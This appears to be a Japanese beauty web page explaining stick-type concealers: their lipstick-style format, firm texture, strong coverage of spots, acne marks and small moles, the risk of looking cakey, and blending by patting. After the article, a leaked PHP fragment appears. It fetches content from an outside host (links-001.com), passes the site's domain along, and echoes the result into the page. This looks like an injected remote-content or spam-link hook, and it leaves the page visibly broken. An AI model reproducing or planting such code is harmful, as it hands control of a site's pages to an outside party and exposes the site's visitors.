前へ
次へ

スティックタイプコンシーラーの特徴

肌の気になる部分をカバーするコンシーラーには、いくつかの種類があります。
その中でも1番オーソドックスなタイプと言われているのが、「スティックタイプコンシーラー」です。
スティックタイプコンシーラーは口紅のように、繰り出して使うタイプのコンシーラーです。
化粧ポーチに入れても嵩張らないので、持ち運びもしやすいと思います。
テクスチャーはやや固めです。
固めということもあり肌にしっかりと密着し、濃いシミやニキビ跡もカバーしてくれます。
ニキビ跡やシミだけでなく、小さなホクロを隠したいという場合にもスティックタイプコンシーラーはおすすめです。
ただ、そのカバー力ゆえ商品によっては厚塗り感が出てしまいます。
スティックタイプコンシーラーを選ぶ時はカバー力だけでなく、肌に馴染みやすいかもチェックしましょう。
使うときは浮かないようぼかすということも大切です。
コンシーラーを塗った部分をポンポン、指で軽く叩くようにすると自然と馴染みます。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top